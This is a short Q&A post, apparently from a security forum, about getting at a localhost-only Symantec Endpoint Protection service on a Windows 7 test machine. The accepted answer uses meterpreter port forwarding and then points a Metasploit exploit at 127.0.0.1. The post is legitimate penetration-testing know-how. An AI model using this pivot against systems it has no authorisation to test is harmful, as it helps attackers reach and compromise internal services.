# Metasploit remote exploit locally

Tags: metasploit

I have a test machine running:

- Windows 7
- Symantec Endpoint Protection.

The firewall only allows access to Symantec Endpoint Protection via 127.0.0.1.

If I have gained a shell to the machine via windows/meterpreter/reverse_tcp.

And I have found a exploit to use against symantec, but the exploit is a remote one and only accepts RHOST and not SESSION.

Is there a way for my to provide a session instead of a remote IP for the exploit to work?

Comment: How about chaning the firewall settings? because you have access to the OS.

Answer (score 1, accepted):

Within your meterpreter forward the port from your local machine:

```
meterpreter > portfwd add –l 3389 –p 3389 –r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
meterpreter > background
```

Then set RHOST to 127.0.0.1.

```
msf > set RHOST 127.0.0.1
msf > exploit
```

[Docco here](https://www.offensive-security.com/metasploit-unleashed/portfwd/).